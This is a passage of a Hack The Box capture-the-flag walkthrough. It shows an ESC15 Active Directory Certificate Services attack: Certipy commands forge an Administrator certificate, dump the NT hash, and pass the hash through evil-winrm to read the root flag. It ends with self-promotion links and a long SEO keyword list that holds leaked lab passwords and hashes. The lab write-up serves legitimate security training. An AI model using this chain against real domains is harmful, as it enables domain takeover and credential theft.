certipy-ad req -u 'cert_admin@tombwatcher.htb' -p 'Test1234.' -dc-ip '10.10.11.72' -target 'dc01.tombwatcher.htb' -ca 'tombwatcher-CA-1' -template 'WebServer' -application-policies 'Certificate Request Agent' Certipy v5.0.2 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [*] Request ID is 5 [*] Successfully requested certificate [*] Got certificate without identity [*] Certificate has no object SID [*] Try using -sid to set the object SID or see the wiki for more details [*] Saving certificate and private key to 'cert_admin.pfx' [*] Wrote certificate and private key to 'cert_admin.pfx'

Although the certificate had no identity of its own, it could now be used to impersonate users via a vulnerable template, completing an ESC15 attack chain.

After compromising the cert_admin account, I enumerated the AD CS environment and found that the User certificate template was vulnerable to ESC15 (allows ENROLLEE_SUPPLIES_SUBJECT, and cert_admin had Certificate Request Agent permissions).

I leveraged this misconfiguration to request a certificate on behalf of the domain administrator using:

certipy-ad req -u 'cert_admin@tombwatcher.htb' -p 'Test1234.' -dc-ip '10.10.11.72' -target 'dc01.tombwatcher.htb' -ca 'tombwatcher-CA-1' -template 'User' -pfx 'cert_admin.pfx' -on-behalf-of 'TOMBWATCHER\Administrator' Certipy v5.0.2 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [*] Request ID is 6 [*] Successfully requested certificate [*] Got certificate with UPN 'Administrator@tombwatcher.htb' [*] Certificate object SID is 'S-1-5-21-1392491010-1358638721-2126982587-500' [*] Saving certificate and private key to 'administrator.pfx' [*] Wrote certificate and private key to 'administrator.pfx'

This gave me a certificate and private key (administrator.pfx) that I used to authenticate as the Administrator:

certipy-ad auth -pfx 'administrator.pfx' -dc-ip '10.10.11.72' Certipy v5.0.2 - by Oliver Lyak (ly4k) [*] Certificate identities: [*] SAN UPN: 'Administrator@tombwatcher.htb' [*] Security Extension SID: 'S-1-5-21-1392491010-1358638721-2126982587-500' [*] Using principal: 'administrator@tombwatcher.htb' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'administrator.ccache' [*] Wrote credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for 'administrator@tombwatcher.htb': aad3b435b51404eeaad3b435b51404ee:f61db423bebe3328d33af26741afe5fc

At this point, I had full domain admin access via PKINIT certificate authentication. After I got the hash "f61db423bebe3328d33af26741afe5fc" for administrator@tombwatcher.htb', I attempted to authenticate to the Windows host at 10.10.11.72 using the Administrator account and an NTLM hash (f61db423bebe3328d33af26741afe5fc) instead of the real password by running the following in my terminal:

evil-winrm -i 10.10.11.72 -u Administrator -H f61db423bebe3328d33af26741afe5fc

After obtaining the evil-winrm shell, I ran the following script to obtain the root flag (Explanation: type was used to display the contents of the file named root.txt located in the Desktop directory one level above the current working directory, which is similar to cat in Linux):

type ../desktop/root.txt

Hurray, I got the root flag!!!

If you enjoy reading my walkthrough, do not forget to like, comment, and subscribe to my YouTube channel and also connect with me on LinkedIn. Also, don't forget to turn on post notification on my YouTube channel and medium to get notification as soon as I write.

Subscribe to my YouTube channel: https://www.youtube.com/@BoltechTechnologies1

Follow me on LinkedIn: https://www.linkedin.com/in/isiaq-ibrahim-468588156/

Follow me on Medium: https://medium.com/@ibrahimbolaji50.ib

Follow me on Twitter: https://x.com/Isiaq_Ibrahim99

Follow me on Twitter: https://x.com/BoltechNG

Buy me a coffee: https://buymeacoffee.com/boltechtechnologies

Keywords

eighteen htb writeup

eighteen htb walkthrough

eighteen htb

htb eighteen writeup

eighteen writeup

htb eighteen

htb eighteen walkthrough

hackthebox eighteen writeup

eighteen walkthrough

gavel htb

eighteen hackthebox writeup

eighteen writeup htb

eighteen hackthebox

gavel htb writeup

eighteen hack the box

hack the box eighteen

gavel writeup

hackthebox eighteen

htb gavel writeup

eighteen walkthrough htb

eighteen hack the box walkthrough

eighteen.htb writeup

hackthebox eighteen walkthrough

hack the box eighteen walkthrough

eighteen.htb

eighteen hackthebox walkthrough

hack the box eighteen writeup

dc01.eighteen.htb

eighteen write up

eighteen hack the box writeup

eighteen htb machine

htb "eighteen" writeup

"overwatch.htb"

htb gavel

htb gavel walkthrough

"eighteen.htb"

eighteen htb write up

pterodactyl htb walkthrough

hackthebox gavel writeup

"eighteen" hackthebox writeup

htb eighteen write up

eighteen machine htb

gavel htb walkthrough

"eighteen" htb writeup

gavel walkthrough

signed htb

facts walkthrough

gavel hackthebox writeup

eighteen.htb walkthrough

gavel htb write up

"eighteen" htb walkthrough

htb "eighteen"

htb signed

facts hackthebox writeup

cctv hackthebox walkthrough

gavel.htb

overwatch htb walkthrough

gavel hack the box

nanocorp walkthrough

hackthebox gavel

eighteen writeup hackthebox

gavel hackthebox

"overwatch" htb writeup

gavel writeup htb

writeup eighteen

hackthebox "eighteen"

"eighteen.htb" writeup

gavel hackthebox walkthrough

wingdata htb

facts htb writeup

hack the box cctv

cctv hack the box

overwatch walkthrough htb

signed.htb

htb wingdata write up

"giveback" htb writeup

"monitorsfour"

"browsed" htb writeup

htb eighteen admin password iloveyou1

gavel.htb/rules

overwatch.htb:5985

htb eighteen privilege escalation walkthrough

htb walkthrough

eighteen.htb hackthebox

hack the box gavel

"pirate.htb"

hercules htb

overwatch hack the box writeup

pterodactyl hack the box walkthrough

nanocorp writeup

overwatch.htb writeup

htb monitorsfour

pterodactyl hackthebox walkthrough

fluffy htb

pterodactyl walkthrough htb

hackthebox hercules

htb browsed

"dc01.eighteen.htb"

32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca

ina2we6harj2gaw!

cctv hackthebox

hackthebox "eighteen" writeup

cctv hackthebox writeup

hack the box gavel sql injection payload inventory.php sort

"eighteen" hack the box writeup

gavel writeup hackthebox

gavel.htb/.git

htb 18

giveback walkthrough

hackthebox cctv

hackthebox gavel walkthrough

hackthebox eighteen machine

htb guardian writeup

htb cctv walkthrough

htb editor writeup

hackthebox facts writeup

nanocorp htb walkthrough

cctv htb

overwatch hack the box walkthrough

pterodactyl hack the box

pterodactyl hack the box writeup

htb cctv

hackthebox nanocorp writeup

overwatch writeup hackthebox

giveback htb writeup

hackthebox airtouch writeup

htb pterodactyl walkthrough

hackthebox overwatch walkthrough

htb overwatch

htb nanocorp writeup

browsed htb writeup

overwatch htb

pterodactyl htb

htb pterodactyl

browsed htb walkthrough

htb artificial

htb topology writeup

topology htb writeup

"0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133"

989c5a8ee87a0e9521ec81a79187d162109282f0

securevision cctv exploit

$2y$10$cmytvwfrnt1xfqsitsjrve/apxwxcifqcurnm5n.rhlulwm0jrtbm

hackthebox facts walkthrough

hack the box wingdata

signed walkthrough

writeup wingdata

htb gavel write up

"giveback.htb"

cctv.htb

cctv htb walkthrough

cctv.htb writeup

editor.htb:8080

htb cctv writeup

giveback htb

htb interpreter walkthrough

hercules writeup

monitorsfour.htb/controllers

wiki.editor.htb

monitorsfour.htb/robots.txt

monitorsfour htb writeup

facts hack the box writeup

editor.htb

nanocorp.htb

conversor walkthrough

hackthebox pterodactyl walkthrough

htb edit

hack the box eighteen machine

giveback htb walkthrough

browsed htb

htb hercules writeup

pterodactyl.htb walkthrough

browsed.htb writeup

planning htb

monitorsfour htb walkthrough

overwatch htb write up

htb fluffy

overwatch hackthebox

hackthebox monitorsfour

htb nanocorp

htb nanocorp walkthrough

nanocorp hackthebox

facts hackthebox walkthrough

pterodactyl writeup htb

"facts.htb"

overwatch htb machine

artificial htb

browsed htb write up

hackthebox pterodactyl

pterodactyl hackthebox writeup

htb pterodactyl writeup

hackthebox nanocorp

htb browsed walkthrough

htb planning

browsed walkthrough

htb gavel sql injection payload inventory.php

hack the box gavel sql injection payload inventory.php

htb gavel walkthrough sql injection payload inventory.php

hack the box gavel sql injection payload inventory.php 2025

overwatch htb writeup

htb gavel walkthrough pdo injection sort parameter

hack the box gavel sql injection payload 2025

htb gavel admin password or hash

htb gavel sql injection payload inventory.php sort

htb gavel walkthrough sql injection inventory.php payload

hack the box gavel sql injection inventory.php payload 2025

htb gavel machine walkthrough pdo injection sort parameter

htb gavel walkthrough sql injection inventory.php

htb machine editor xwiki simplistcode pro

hack the box gavel walkthrough sql injection payload

hack the box gavel walkthrough sql injection payload inventory.php

hackthebox eighteen machine walkthrough

htb gavel walkthrough sql injection payload

nanocorp htb

hackthebox gavel sql injection payload inventory.php

gavel.htb/admin.php

hack the box gavel sql injection inventory.php payload

htb eighteen machine walkthrough

htb overwatch walkthrough

"gavel.htb"

hack the box gavel walkthrough pdo injection

facts htb walkthrough

hack the box eighteen machine walkthrough

htb gavel exact sql injection payload inventory.php

facts.htb:54321

eighteen.htb:5985

htb overwatch writeup

"browsed.htb"

gavel 2.0 exploit

nanocorp htb writeup

hackthebox overwatch writeup

"0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133" password

gavel.htb/includes

overwatch hackthebox writeup

hercules htb writeup

editor htb

gavel-util

signed htb walkthrough

overwatch writeup htb

guardian htb writeup

overwatch hackthebox walkthrough

gavel htb admin password or hash

"hack the box" "eighteen" writeup

monitorsfour.htb:5985

eighteen htb github

cctv htb writeup

editor htb walkthrough

"eighteen" htb

hercules htb walkthrough

conversor htb walkthrough

pterodactyl htb writeup